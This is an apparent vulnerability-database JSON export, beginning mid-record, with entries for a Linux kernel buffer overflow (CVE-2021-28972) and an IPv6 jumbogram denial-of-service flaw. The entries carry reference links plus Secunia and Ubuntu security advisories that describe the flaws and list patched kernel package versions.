        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ]
  },
  "id": "VAR-202103-1244",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:42:38.340000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Fix\u00a0potential\u00a0drc_name\u00a0corruption\u00a0in\u00a0store\u00a0functions NetAppNetApp\u00a0Advisory",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=144778"
      },
      {
        "title": "Red Hat: CVE-2021-28972",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-28972"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-28972 log"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.1
      },
      {
        "problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 1.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cc7a0bb058b85ea03db87169c60c7cfdd5d34678"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210430-0003/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ptrnpqtz4gvs46sz4obxy5ydogvpstgq/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t2s3i4slrnruqdofyus6iuazmqnmpnlg/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t2s3i4slrnruqdofyus6iuazmqnmpnlg/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ptrnpqtz4gvs46sz4obxy5ydogvpstgq/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-28972"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1225"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162939/ubuntu-security-notice-usn-4979-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1919"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162981/ubuntu-security-notice-usn-4984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1964"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162549/ubuntu-security-notice-usn-4948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1655"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-buffer-overflow-via-add-slot-store-34914"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1946"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1307"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1625"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1669"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166417/ubuntu-security-notice-usn-5343-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1231"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021092209"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1299"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1694"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166101/ubuntu-security-notice-usn-5299-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28964"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29647"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31916"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29264"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28952"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/198510"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1046.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-74.83~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1040.41"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1044.46~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1044.47~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4982-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1044.47"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1016.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1048.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-74.83"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1046.50~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1048.50~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1049.51~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1016.17~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1049.51"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1033.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28038"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4984-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-55.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1028.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-55.62~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3428"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1092.94"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4979-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1115.128"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1103.110"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1100.113"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1072.80"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-144.148"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1103.112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2853"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26558"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12655"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20292"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5995"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5343-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19449"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2854"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4948-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29266"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29657"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29649"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28951"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3491"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29646"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45485"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3679"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-42008"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5299-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38204"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-22T00:00:00",
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "date": "2021-03-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "date": "2022-06-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "date": "2021-06-04T13:36:04",
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "date": "2021-06-04T22:09:37",
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "date": "2021-06-03T14:55:48",
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "date": "2022-03-23T16:02:30",
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "date": "2021-05-12T13:52:40",
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "date": "2022-02-22T17:06:12",
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "date": "2021-03-22T17:15:15.200000",
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "date": "2021-03-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "date": "2021-04-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-06-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "date": "2021-04-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "date": "2022-06-28T06:12:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "date": "2023-11-07T03:32:25.477000",
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "date": "2022-03-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "date": "2021-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Classic buffer overflow vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ],
    "trust": 1.2
  }
}

var-201001-0659
Vulnerability from variot

The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.32.4, when network namespaces are enabled, allows remote attackers to cause a denial of service (NULL pointer dereference) via an invalid IPv6 jumbogram, a related issue to CVE-2007-4567. Linux The kernel IPv6 jumbogram There is a vulnerability in the processing of. Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users. This vulnerability is related to CVE-2007-4567. ----------------------------------------------------------------------

Secunia integrated with Microsoft WSUS http://secunia.com/blog/71/


TITLE: Fedora update for kernel

SECUNIA ADVISORY ID: SA38168

VERIFY ADVISORY: http://secunia.com/advisories/38168/

DESCRIPTION: Fedora has issued an update for the kernel. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Successful exploitation requires that network namespaces are enabled.

SOLUTION: Apply updated packages via the yum utility ("yum update kernel").

ORIGINAL ADVISORY: FEDORA-2010-0823: https://admin.fedoraproject.org/updates/F12/FEDORA-2010-0823


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. =========================================================== Ubuntu Security Notice USN-894-1 February 05, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138, CVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538, CVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.82 linux-image-2.6.15-55-686 2.6.15-55.82 linux-image-2.6.15-55-amd64-generic 2.6.15-55.82 linux-image-2.6.15-55-amd64-k8 2.6.15-55.82 linux-image-2.6.15-55-amd64-server 2.6.15-55.82 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.82 linux-image-2.6.15-55-hppa32 2.6.15-55.82 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.82 linux-image-2.6.15-55-hppa64 2.6.15-55.82 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.82 linux-image-2.6.15-55-itanium 2.6.15-55.82 linux-image-2.6.15-55-itanium-smp 2.6.15-55.82 linux-image-2.6.15-55-k7 2.6.15-55.82 linux-image-2.6.15-55-mckinley 2.6.15-55.82 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc 2.6.15-55.82 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.82 linux-image-2.6.15-55-server 2.6.15-55.82 linux-image-2.6.15-55-server-bigiron 2.6.15-55.82 linux-image-2.6.15-55-sparc64 2.6.15-55.82 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.82

Ubuntu 8.04 LTS: linux-image-2.6.24-27-386 2.6.24-27.65 linux-image-2.6.24-27-generic 2.6.24-27.65 linux-image-2.6.24-27-hppa32 2.6.24-27.65 linux-image-2.6.24-27-hppa64 2.6.24-27.65 linux-image-2.6.24-27-itanium 2.6.24-27.65 linux-image-2.6.24-27-lpia 2.6.24-27.65 linux-image-2.6.24-27-lpiacompat 2.6.24-27.65 linux-image-2.6.24-27-mckinley 2.6.24-27.65 linux-image-2.6.24-27-openvz 2.6.24-27.65 linux-image-2.6.24-27-powerpc 2.6.24-27.65 linux-image-2.6.24-27-powerpc-smp 2.6.24-27.65 linux-image-2.6.24-27-powerpc64-smp 2.6.24-27.65 linux-image-2.6.24-27-rt 2.6.24-27.65 linux-image-2.6.24-27-server 2.6.24-27.65 linux-image-2.6.24-27-sparc64 2.6.24-27.65 linux-image-2.6.24-27-sparc64-smp 2.6.24-27.65 linux-image-2.6.24-27-virtual 2.6.24-27.65 linux-image-2.6.24-27-xen 2.6.24-27.65

Ubuntu 8.10: linux-image-2.6.27-17-generic 2.6.27-17.45 linux-image-2.6.27-17-server 2.6.27-17.45 linux-image-2.6.27-17-virtual 2.6.27-17.45

Ubuntu 9.04: linux-image-2.6.28-18-generic 2.6.28-18.59 linux-image-2.6.28-18-imx51 2.6.28-18.59 linux-image-2.6.28-18-iop32x 2.6.28-18.59 linux-image-2.6.28-18-ixp4xx 2.6.28-18.59 linux-image-2.6.28-18-lpia 2.6.28-18.59 linux-image-2.6.28-18-server 2.6.28-18.59 linux-image-2.6.28-18-versatile 2.6.28-18.59 linux-image-2.6.28-18-virtual 2.6.28-18.59

Ubuntu 9.10: kernel-image-2.6.31-108-imx51-di 2.6.31-108.21 linux-image-2.6.31-19-386 2.6.31-19.56 linux-image-2.6.31-19-generic 2.6.31-19.56 linux-image-2.6.31-19-generic-pae 2.6.31-19.56 linux-image-2.6.31-19-ia64 2.6.31-19.56 linux-image-2.6.31-19-lpia 2.6.31-19.56 linux-image-2.6.31-19-powerpc 2.6.31-19.56 linux-image-2.6.31-19-powerpc-smp 2.6.31-19.56 linux-image-2.6.31-19-powerpc64-smp 2.6.31-19.56 linux-image-2.6.31-19-server 2.6.31-19.56 linux-image-2.6.31-19-sparc64 2.6.31-19.56 linux-image-2.6.31-19-sparc64-smp 2.6.31-19.56 linux-image-2.6.31-19-virtual 2.6.31-19.56 linux-image-2.6.31-211-dove 2.6.31-211.22 linux-image-2.6.31-211-dove-z0 2.6.31-211.22 linux-image-2.6.31-304-ec2 2.6.31-304.10

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06) the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. If a user were tricked into mounting a specially crafted filesystem, a remote attacker could crash the system or gain root privileges. (CVE-2009-4020, CVE-2009-4308)

It was discovered that FUSE did not correctly check certain requests. A local attacker with access to FUSE mounts could exploit this to crash the system or possibly gain root privileges. Ubuntu 9.10 was not affected. (CVE-2009-4021)

It was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-4031)

It was discovered that the OHCI fireware driver did not correctly handle certain ioctls. A local attacker could exploit this to crash the system, or possibly gain root privileges. Ubuntu 6.06 was not affected. (CVE-2009-4138)

Tavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. A local attacker could exploit this to gain root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)

Neil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. An attacker on the local network could send specially crafted traffic to bypass packet filters, crash the system, or possibly gain root privileges. (CVE-2009-4536, CVE-2009-4538)

It was discovered that "print-fatal-signals" reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. By default this is disabled in Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)

Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. A remote attacker could exploit this to crash the system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2010-0006)

